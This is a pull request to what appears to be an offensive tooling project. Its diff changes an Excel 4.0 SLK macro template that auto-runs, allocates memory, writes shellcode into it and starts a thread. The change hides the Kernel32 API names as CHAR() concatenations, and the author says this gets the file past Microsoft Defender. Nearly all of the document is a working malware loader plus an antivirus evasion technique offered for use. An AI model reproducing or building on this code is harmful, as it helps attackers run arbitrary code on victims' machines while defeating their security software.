### PR TITLE
SLK Defender bypass stuff

### DIFF
--- a/modules/excel4.py
+++ b/modules/excel4.py
@@ -4,25 +4,41 @@ import sys
 # Some of this code is bastardised from code by @StanHacked
 # For a breakdown of this technique I recommend watching
 # http://www.irongeek.com/i.php?page=videos/derbycon8/track-3-18-the-ms-office-magic-show-stan-hegt-pieter-ceelen
+def str2chars(funcname):
+    result = ""
+    i = 0
+    for char in funcname:
+        if i == 0:
+            result += "CHAR({})".format(ord(char))
+        else:
+            result += "&CHAR({})".format(ord(char))
+        i += 1
+    return result
 
 def bytes2int(str):
 	return int(str.encode('hex'), 16)
+
+# Currently will get past Defender
+ENC_KERNEL32 = str2chars("Kernel32")
+ENC_VIRTUALALLOC = str2chars("VirtualAlloc")
+ENC_WRITEPROCESSMEMORY = str2chars("WriteProcessMemory")
+ENC_CREATETHREAD = str2chars("CreateThread")
 
 SHELLCODE_HEADER = """ID;P
 O;E
 NN;NAuto_open;ER1C1;KSpreadsheet;F
 C;X1;Y1;K0;ER1C2()
-C;X1;Y2;K0;ECALL("Kernel32","VirtualAlloc","JJJJJ",0,1000000,4096,64)
+C;X1;Y2;K0;ECALL({},{},"JJJJJ",0,1000000,4096,64)
 C;X1;Y3;K0;ESELECT(R1C2:R1000:C2,R1C2)
 C;X1;Y4;K0;ESET.VALUE(R1C3, 0)
 C;X1;Y5;K0;EWHILE(LEN(ACTIVE.CELL())>0)
-C;X1;Y6;K0;ECALL("Kernel32","WriteProcessMemory","JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
+C;X1;Y6;K0;ECALL({},{},"JJJCJJ",-1, R2C1 + R1C3 * 20,ACTIVE.CELL(), LEN(ACTIVE.CELL()), 0)
 C;X1;Y7;K0;ESET.VALUE(R1C3, R1C3 + 1)
 C;X1;Y8;K0;ESELECT(, "R[1]C")
 C;X1;Y9;K0;ENEXT()
-C;X1;Y10;K0;ECALL("Kernel32","CreateThread","JJJJJJJ",0, 0, R2C1, 0, 0, 0)
+C;X1;Y10;K0;ECALL({},{},"JJJJJJJ",0, 0, R2C1, 0, 0, 0)
 C;X1;Y11;K0;EHALT()
-"""
+""".format(ENC_KERNEL32, ENC_VIRTUALALLOC, ENC_KERNEL32, ENC_WRITEPROCESSMEMORY, ENC_KERNEL32, ENC_CREATETHREAD)
 
 def generate_slk(shellcode_path):
 	return build_shellcode_slk(shellcode_path)


### PR DESCRIPTION
I know it's not your job to maintain this project with anti-virus bypasses, but thought I'd share a little legwork I did to get past Defender. As I'm sure you already know, Defender will delete any files on disk with "known bad" function calls, like VirtualAlloc, CreateThread, etc. if in plaintext. This just encodes the function and library names to their char equivalents. Probably worth testing before merging.

Cheers!